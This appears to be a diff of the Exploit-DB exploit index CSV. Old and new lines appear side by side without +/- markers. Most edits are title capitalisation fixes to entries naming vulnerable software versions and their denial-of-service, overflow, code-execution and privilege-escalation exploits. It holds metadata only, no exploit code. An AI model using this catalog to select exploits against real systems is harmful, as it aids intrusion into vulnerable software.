6394,exploits/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPd Remote Denial of Service Denial of Service (PoC)",2008-09-07,"Alex Hernandez",dos,hardware,
6424,exploits/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service",2008-09-11,"Jeremy Brown",dos,windows,
6434,exploits/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 - Unicode Remote Denial of Service (PoC)",2008-09-11,LiquidWorm,dos,windows,
6458,exploits/windows/dos/6458.c,"The Personal FTP Server 6.0f - RETR Denial of Service",2008-09-14,Shinnok,dos,windows,
@ -1897,7 +1897,7 @@ id,file,description,date,author,type,platform,port
16193,exploits/windows/dos/16193.pl,"Avira AntiVir - '.QUA' File 'avcenter.exe' Local Crash (PoC)",2011-02-19,KedAns-Dz,dos,windows,
16204,exploits/windows/dos/16204.pl,"Solar FTP Server 2.1 - Denial of Service",2011-02-22,x000,dos,windows,
16190,exploits/windows/dos/16190.pl,"IBM Lotus Domino LDAP - Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows,
16191,exploits/windows/dos/16191.pl,"Novell ZenWorks 10/11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows,
16191,exploits/windows/dos/16191.pl,"Novell ZENworks 10/11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows,
16192,exploits/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,linux,
16254,exploits/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption (PoC)",2011-02-28,LiquidWorm,dos,windows,
16203,exploits/windows/dos/16203.txt,"WinMerge 2.12.4 - Project File Handling Stack Overflow",2011-02-22,LiquidWorm,dos,windows,
@ -2312,7 +2312,7 @@ id,file,description,date,author,type,platform,port
19507,exploits/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",dos,solaris,
19513,exploits/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",dos,hardware,
19531,exploits/hardware/dos/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",dos,hardware,
19536,exploits/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",dos,multiple,
19536,exploits/multiple/dos/19536.txt,"Apache 1.1 / NCSA HTTPd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",dos,multiple,
19541,exploits/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",dos,novell,
19562,exploits/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",dos,windows,
19563,exploits/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",dos,windows,
@ -2510,7 +2510,7 @@ id,file,description,date,author,type,platform,port
20655,exploits/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,dos,windows,
20656,exploits/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,dos,windows,
20659,exploits/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Denial of Service",2001-03-01,"the Strumpf Noir Society",dos,multiple,
20662,exploits/windows/dos/20662.txt,"WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service",2001-02-28,joetesta,dos,windows,
20662,exploits/windows/dos/20662.txt,"WhitSoft SlimServe HTTPd 1.1 - 'GET_ Denial of Service",2001-02-28,joetesta,dos,windows,
20664,exploits/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",dos,windows,
20681,exploits/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,dos,windows,
20682,exploits/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,dos,windows,
@ -2526,7 +2526,7 @@ id,file,description,date,author,type,platform,port
20750,exploits/linux/dos/20750.txt,"Trend Micro Interscan VirusWall (Linux) 3.0.1 - Multiple Program Buffer Overflows",2001-04-13,"eeye security",dos,linux,
20753,exploits/cgi/dos/20753.txt,"IBM Websphere/Net.Commerce 3 - CGI-BIN Macro Denial of Service",2001-04-13,"ET LoWNOISE",dos,cgi,
20763,exploits/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy - Denial of Service",2001-04-16,"SecureXpert Labs",dos,windows,
20770,exploits/windows/dos/20770.txt,"GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service",2001-04-17,nemesystm,dos,windows,
20770,exploits/windows/dos/20770.txt,"GoAhead Web Server 2.1 (Windows) - Denial of Service",2001-04-17,nemesystm,dos,windows,
20771,exploits/windows/dos/20771.txt,"Simpleserver WWW 1.0.x - AUX Directory Denial of Service",2001-04-17,nemesystm,dos,windows,
20779,exploits/windows/dos/20779.pl,"Oracle 8 Server - 'TNSLSNR80.EXE' Denial of Service",2001-04-18,r0ot@runbox.com,dos,windows,
20783,exploits/windows/dos/20783.txt,"Rit Research Labs 'The Bat!' 1.x - Missing Linefeeds Denial of Service",2001-04-18,3APA3A,dos,windows,
@ -2602,7 +2602,7 @@ id,file,description,date,author,type,platform,port
21177,exploits/windows/dos/21177.txt,"Microsoft IIS 5.0 - False Content-Length Field Denial of Service",2001-12-11,"Ivan Hernandez Puga",dos,windows,
40757,exploits/windows/dos/40757.xhtml,"Microsoft Internet Explorer 11 - MSHTML CMap­Element::Notify Use-After-Free (MS15-009)",2016-11-14,Skylined,dos,windows,
21181,exploits/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0 / Mozilla 0.9.6 / Opera 5.1 - Image Count Denial of Service",2001-12-11,"Pavel Titov",dos,multiple,
21202,exploits/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,dos,linux,
21202,exploits/linux/dos/21202.txt,"Anti-Web HTTPd 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,dos,linux,
21213,exploits/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,dos,multiple,
21224,exploits/linux_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,dos,linux_x86-64,
21228,exploits/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",dos,windows,
@ -3160,7 +3160,7 @@ id,file,description,date,author,type,platform,port
24042,exploits/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - 'YInsthelper.dll' Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",dos,windows,
24051,exploits/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",dos,windows,
24066,exploits/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",dos,multiple,
24070,exploits/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",dos,multiple,
24070,exploits/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPd 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",dos,multiple,
24078,exploits/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,dos,linux,
24080,exploits/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Denial of Service",2004-05-04,storm,dos,windows,
24095,exploits/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow (PoC)",2004-05-06,"Joel Eriksson",dos,linux,
@ -3515,7 +3515,7 @@ id,file,description,date,author,type,platform,port
27211,exploits/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities",2006-02-14,ZwelL,dos,multiple,
27212,exploits/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 - LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",dos,multiple,
27232,exploits/hardware/dos/27232.txt,"Nokia N70 - L2CAP Packets Remote Denial of Service",2006-02-15,"Pierre Betouin",dos,hardware,
27241,exploits/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service",2006-02-16,l0om,dos,hardware,
27241,exploits/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPd Denial of Service",2006-02-16,l0om,dos,hardware,
27246,exploits/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service",2006-02-17,DrFrancky,dos,linux,
27253,exploits/linux/dos/27253.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Denial of Service",2006-02-21,"Yuan Qi",dos,linux,
27257,exploits/linux/dos/27257.html,"Mozilla (Multiple Products) - iFrame JavaScript Execution",2006-02-22,"Georgi Guninski",dos,linux,
@ -5260,6 +5260,7 @@ id,file,description,date,author,type,platform,port
43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows,
43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows,
43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa & Stefano Farletti",dos,hardware,
43891,exploits/hardware/dos/43891.txt,"Lorex LH300 Series - ActiveX Buffer Overflow (PoC)",2015-01-18,"Pedro Ribeiro",dos,hardware,
40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@ -5782,7 +5783,7 @@ id,file,description,date,author,type,platform,port
43060,exploits/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",dos,windows,
43111,exploits/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,dos,multiple,
43115,exploits/windows/dos/43115.py,"Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)",2017-11-03,"Kevin McGuigan",dos,windows,
43119,exploits/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware,
43119,exploits/hardware/dos/43119.py,"Debut Embedded HTTPd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware,
43120,exploits/windows/dos/43120.txt,"Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,dos,windows,
43124,exploits/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,dos,windows,
43131,exploits/windows/dos/43131.html,"Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free",2017-11-09,"Google Security Research",dos,windows,
@ -7362,7 +7363,7 @@ id,file,description,date,author,type,platform,port
17966,exploits/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit)",2011-10-10,Metasploit,local,windows,
17967,exploits/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,local,windows,
17985,exploits/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow (Metasploit)",2011-10-16,Metasploit,local,windows,
18040,exploits/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change",2011-10-28,vladz,local,linux,
18040,exploits/linux/local/18040.c,"X.Org xorg 1.4 < 1.11.2 - File Permission Change",2011-10-28,vladz,local,linux,
18027,exploits/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Local Stack Buffer Overflow (Metasploit)",2011-10-24,Metasploit,local,windows,
18038,exploits/windows/local/18038.rb,"GTA SA-MP - 'server.cfg' Local Buffer Overflow (Metasploit)",2011-10-26,Metasploit,local,windows,
18064,exploits/linux/local/18064.sh,"Calibre E-Book Reader - Local Privilege Escalation (1)",2011-11-02,zx2c4,local,linux,
@ -9172,9 +9173,10 @@ id,file,description,date,author,type,platform,port
43816,exploits/windows/local/43816.txt,"dbPowerAmp < 2.0/10.0 - Buffer Overflow",2014-09-27,"GulfTech Security",local,windows,
43817,exploits/windows/local/43817.txt,"PsychoStats < 2.2.4 Beta - Cross Site Scripting",2014-12-22,"GulfTech Security",local,windows,
43857,exploits/windows/local/43857.py,"HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation",2018-01-23,"Peter Lapp",local,windows,
43875,exploits/windows/local/43875.rb,"Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit)",2018-01-24,Metasploit,local,windows,
43875,exploits/windows/local/43875.rb,"Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)",2018-01-24,Metasploit,local,windows,
43878,exploits/multiple/local/43878.md,"Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape",2018-01-24,SecuriTeam,local,multiple,
43879,exploits/windows/local/43879.txt,"Blizzard Update Agent - JSON RPC DNS Rebinding",2018-01-23,"Google Security Research",local,windows,1120
43887,exploits/multiple/local/43887.txt,"ICU library 52 < 54 - Multiple Vulnerabilities",2015-06-10,"Pedro Ribeiro",local,multiple,
40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows,
40540,exploits/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,
40541,exploits/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,
@ -10311,7 +10313,7 @@ id,file,description,date,author,type,platform,port
4715,exploits/windows/remote/4715.txt,"BadBlue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",remote,windows,
4720,exploits/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,remote,windows,
4724,exploits/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,remote,windows,80
4744,exploits/hardware/remote/4744.txt,"rooter VDSL Device - Goahead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,
4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,
4745,exploits/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,remote,windows,
4746,exploits/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,remote,windows,
4747,exploits/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - 'ulang' Remote Command Execution",2007-12-18,rgod,remote,windows,
@ -10381,7 +10383,7 @@ id,file,description,date,author,type,platform,port
5205,exploits/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Remote Buffer Overflow",2008-02-29,Elazar,remote,windows,
5212,exploits/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,remote,windows,
5213,exploits/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",remote,windows,
5215,exploits/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,remote,multiple,
5215,exploits/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,remote,multiple,
5224,exploits/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution",2008-03-09,DarkFig,remote,linux,
5228,exploits/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",remote,windows,
5230,exploits/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",remote,windows,
@ -11825,7 +11827,7 @@ id,file,description,date,author,type,platform,port
17656,exploits/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,remote,windows,
17659,exploits/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,remote,windows,
17670,exploits/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",remote,hardware,
17669,exploits/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,remote,windows,
17669,exploits/windows/remote/17669.py,"Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow",2011-08-15,nion,remote,windows,
17672,exploits/windows/remote/17672.html,"Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free",2011-08-16,mr_me,remote,windows,
17691,exploits/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)",2011-08-19,Metasploit,remote,multiple,
17692,exploits/windows/remote/17692.rb,"Solar FTP Server 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,remote,windows,
@ -12063,7 +12065,7 @@ id,file,description,date,author,type,platform,port
19247,exploits/linux/remote/19247.c,"Microsoft IIS 4.0 - Remote Buffer Overflow (3)",1999-06-15,"eeye security",remote,linux,
19248,exploits/windows/remote/19248.c,"Microsoft IIS 4.0 - Remote Buffer Overflow (4)",1999-06-15,"Greg Hoglund",remote,windows,
19251,exploits/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four / Zero Header Length",1999-06-16,badi,remote,linux,
19253,exploits/linux/remote/19253.txt,"Debian 2.1 - httpd",1999-06-17,anonymous,remote,linux,
19253,exploits/linux/remote/19253.txt,"Debian 2.1 - HTTPd",1999-06-17,anonymous,remote,linux,
19266,exploits/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Remote Stack Overflow",2012-06-18,modpr0be,remote,windows,
19288,exploits/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",remote,windows,
19291,exploits/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Remote Stack Buffer Overflow (Metasploit)",2012-06-19,Metasploit,remote,windows,
@ -12485,7 +12487,7 @@ id,file,description,date,author,type,platform,port
20430,exploits/cgi/remote/20430.txt,"Info2www 1.0/1.1 - CGI Input Handling",1998-03-03,"Niall Smart",remote,cgi,
20433,exploits/cgi/remote/20433.txt,"CGI City CC Whois 1.0 - MetaCharacter",1999-11-09,"Cody T. - hhp",remote,cgi,
20434,exploits/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal",1998-01-26,"Dennis Moore",remote,cgi,
20435,exploits/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,remote,cgi,
20435,exploits/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x / NCSA HTTPd 1.x - 'test-cgi' Directory Listing",1996-04-01,@stake,remote,cgi,
20441,exploits/multiple/remote/20441.txt,"IBM Net.Data 7.0 - Full Path Disclosure",2000-11-29,"Chad Kalmes",remote,multiple,
20442,exploits/cgi/remote/20442.html,"Greg Matthews - 'Classifieds.cgi' 1.0 Hidden Variable",1998-12-15,anonymous,remote,cgi,
20444,exploits/cgi/remote/20444.txt,"Greg Matthews - 'Classifieds.cgi' 1.0 MetaCharacter",1998-12-15,anonymous,remote,cgi,
@ -12995,7 +12997,7 @@ id,file,description,date,author,type,platform,port
40347,exploits/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow",2002-09-17,"Solar Eclipse",remote,unix,80
21675,exploits/windows/remote/21675.pl,"Trillian 0.x IRC Module - Remote Buffer Overflow",2002-07-31,"John C. Hennessy",remote,windows,
21677,exploits/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,remote,solaris,
21678,exploits/solaris/remote/21678.c,"Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String",2002-08-02,ghandi,remote,solaris,
21678,exploits/solaris/remote/21678.c,"Inso DynaWeb HTTPd 3.1/4.0.2/4.1 - Format String",2002-08-02,ghandi,remote,solaris,
21680,exploits/windows/remote/21680.pl,"Qualcomm Eudora 5 - MIME MultiPart Boundary Buffer Overflow",2002-08-05,Kanatoko,remote,windows,
21681,exploits/windows/remote/21681.html,"Opera 6.0.x - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",remote,windows,
21682,exploits/unix/remote/21682.txt,"Mozilla 1.0/1.1 - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",remote,unix,
@ -13006,7 +13008,7 @@ id,file,description,date,author,type,platform,port
21697,exploits/windows/remote/21697.txt,"Apache 2.0 - Encoded Backslash Directory Traversal",2002-08-09,"Auriemma Luigi",remote,windows,
21698,exploits/windows/remote/21698.txt,"BlueFace Falcon Web Server 2.0 - Error Message Cross-Site Scripting",2002-08-09,"Matt Murphy",remote,windows,
21699,exploits/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",remote,hardware,
21704,exploits/unix/remote/21704.txt,"W3C CERN httpd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",remote,unix,
21704,exploits/unix/remote/21704.txt,"W3C CERN HTTPd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",remote,unix,
21705,exploits/windows/remote/21705.txt,"Microsoft Internet Explorer 6 - File Attachment Script Execution",2002-08-13,http-equiv,remote,windows,
21706,exploits/linux/remote/21706.txt,"RedHat Interchange 4.8.x - Arbitrary File Read",2002-08-13,anonymous,remote,linux,
21707,exploits/windows/remote/21707.txt,"GoAhead Web Server 2.1 - Arbitrary Command Execution",2002-08-14,anonymous,remote,windows,
@ -13079,7 +13081,7 @@ id,file,description,date,author,type,platform,port
21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,
21932,exploits/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 - S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",remote,windows,
21934,exploits/linux/remote/21934.txt,"KDE 3.0.x - KPF Icon Option File Disclosure",2002-10-11,"Ajay R Ramjatan",remote,linux,
21936,exploits/linux/remote/21936.c,"ATP httpd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,remote,linux,
21936,exploits/linux/remote/21936.c,"ATP HTTPd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,remote,linux,
21937,exploits/linux/remote/21937.c,"ghttpd 1.4.x - 'Log()' Remote Buffer Overflow",2002-10-07,flea,remote,linux,
21940,exploits/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",remote,windows,
21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple,
@ -13087,7 +13089,7 @@ id,file,description,date,author,type,platform,port
21945,exploits/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow",2002-10-17,"securma massine",remote,linux,
21947,exploits/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,remote,unix,
21948,exploits/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,remote,unix,
21955,exploits/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,remote,windows,
21955,exploits/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - 'SOCKS4' Buffer Overflow",2002-10-21,Kanatoko,remote,windows,
21958,exploits/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",remote,windows,
21959,exploits/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",remote,windows,
21964,exploits/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",remote,windows,
@ -13101,8 +13103,8 @@ id,file,description,date,author,type,platform,port
22000,exploits/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,remote,cgi,
22001,exploits/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",remote,windows,
22007,exploits/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",remote,windows,
22012,exploits/linux/remote/22012.c,"Light HTTPd 0.1 - GET Buffer Overflow (1)",2002-11-12,Xpl017Elz,remote,linux,
22013,exploits/linux/remote/22013.c,"Light HTTPd 0.1 - GET Buffer Overflow (2)",2002-11-12,uid0x00,remote,linux,
22012,exploits/linux/remote/22012.c,"Light HTTPd 0.1 - 'GET' Buffer Overflow (1)",2002-11-12,Xpl017Elz,remote,linux,
22013,exploits/linux/remote/22013.c,"Light HTTPd 0.1 - 'GET' Buffer Overflow (2)",2002-11-12,uid0x00,remote,linux,
22016,exploits/linux/remote/22016.c,"LibHTTPD 1.2 - POST Buffer Overflow",2002-11-13,Xpl017Elz,remote,linux,
22018,exploits/windows/remote/22018.pl,"Key Focus KF Web Server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,remote,windows,
22020,exploits/multiple/remote/22020.pl,"Perception LiteServe 2.0 - CGI Source Disclosure",2002-11-14,mattmurphy,remote,multiple,
@ -13882,7 +13884,7 @@ id,file,description,date,author,type,platform,port
25191,exploits/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",remote,multiple,
25194,exploits/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",remote,windows,
29277,exploits/windows/remote/29277.txt,"Winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",remote,windows,
24999,exploits/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Remote Buffer Overflow",2013-04-25,"Jacob Holcomb",remote,windows,
24999,exploits/windows/remote/24999.py,"Light HTTPd 0.1 (Windows) - Remote Buffer Overflow",2013-04-25,"Jacob Holcomb",remote,windows,
25294,exploits/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,remote,windows,
25001,exploits/linux/remote/25001.rb,"GroundWork - 'monarch_scan.cgi' OS Command Injection (Metasploit)",2013-04-25,Metasploit,remote,linux,
25005,exploits/linux/remote/25005.txt,"NASM 0.98.x - Error Preprocessor Directive Buffer Overflow",2004-12-15,"Jonathan Rockway",remote,linux,
@ -14105,7 +14107,7 @@ id,file,description,date,author,type,platform,port
26622,exploits/php/remote/26622.rb,"InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)",2013-07-05,Metasploit,remote,php,
40386,exploits/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",remote,hardware,161
26737,exploits/linux_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force",2013-07-11,kingcope,remote,linux_x86,
26739,exploits/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Remote Stack Buffer Overflow",2013-07-11,superkojiman,remote,windows,80
26739,exploits/windows/remote/26739.py,"Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow",2013-07-11,superkojiman,remote,windows,80
26741,exploits/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",remote,linux,
26768,exploits/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,remote,cgi,
26773,exploits/windows/remote/26773.txt,"LogiSphere 0.9.9 j - 'viewsource.jsp?source' Traversal Arbitrary File Access",2005-12-12,dr_insane,remote,windows,
@ -14170,7 +14172,7 @@ id,file,description,date,author,type,platform,port
